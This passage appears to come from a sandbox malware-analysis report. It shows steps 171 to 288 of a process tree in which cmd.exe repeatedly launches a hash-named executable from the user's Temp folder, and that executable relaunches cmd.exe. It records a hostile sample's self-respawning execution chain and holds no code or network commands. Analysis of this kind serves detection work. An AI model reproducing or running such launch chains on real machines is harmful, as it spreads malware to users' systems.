171⤵
PID:5888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
172⤵
PID:1568

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
173⤵
PID:2188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
174⤵
PID:4712

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
175⤵
PID:3412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
176⤵
PID:248

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
177⤵
PID:2940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
178⤵
PID:1892

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
179⤵
PID:5128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
180⤵
PID:5812

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
181⤵
PID:3560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
182⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
183⤵
PID:3268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
184⤵
PID:4340

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
185⤵
PID:3468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
186⤵
PID:2752

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
187⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
188⤵
PID:3208

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
189⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
190⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
191⤵
PID:4060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
192⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
193⤵
PID:340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
194⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
195⤵
PID:5996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
196⤵
PID:6000

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
197⤵
PID:5128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
198⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
199⤵
PID:3056

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
200⤵
PID:2028

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
201⤵
PID:1772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
202⤵
PID:1308

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
203⤵
PID:3116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
204⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
205⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
206⤵
PID:2344

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
207⤵
PID:5348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
208⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
209⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
210⤵
PID:4132

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
211⤵
PID:3580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
212⤵
PID:572

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
213⤵
PID:2492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
214⤵
PID:5980

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
215⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
216⤵
PID:3844

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
217⤵
PID:5648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
218⤵
PID:2128

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
219⤵
PID:5784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
220⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
221⤵
PID:4792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
222⤵
PID:2760

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
223⤵
PID:1672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
224⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
225⤵
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
226⤵
PID:4844

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
227⤵
PID:5572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
228⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
229⤵
PID:336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
230⤵
PID:5548

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
231⤵
PID:3692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
232⤵
PID:1604

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
233⤵
PID:5676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
234⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
235⤵
PID:2692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
236⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
237⤵
PID:3616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
238⤵
PID:2492

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
239⤵
PID:656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
240⤵
PID:4256

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
241⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
242⤵
PID:916

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
243⤵
PID:6140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
244⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
245⤵
PID:5488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
246⤵
PID:2792

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
247⤵
PID:3828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
248⤵
PID:3128

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
249⤵
PID:5868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
250⤵
PID:3136

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
251⤵
PID:2384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
252⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
253⤵
PID:1312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
254⤵
PID:1396

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
255⤵
PID:3352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
256⤵
PID:3876

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
257⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
258⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
259⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
260⤵
PID:764

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
261⤵
PID:3344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
262⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
263⤵
PID:3272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
264⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
265⤵
PID:3156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
266⤵
PID:5616

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
267⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
268⤵
PID:1044

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
269⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
270⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
271⤵
PID:6096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
272⤵
PID:324

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
273⤵
PID:1676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
274⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
275⤵
PID:904

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
276⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
277⤵
PID:432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
278⤵
PID:3316

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
279⤵
PID:5700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
280⤵
PID:3692

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
281⤵
PID:1992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
282⤵
PID:5784

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
283⤵
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
284⤵
PID:3684

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
285⤵
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
286⤵
PID:4224

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa
287⤵
PID:2008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa"
288⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\e270915d93536de8953dcf4001c4aa95e9b3c3ead079dbde425d65e1f7237efa.exe
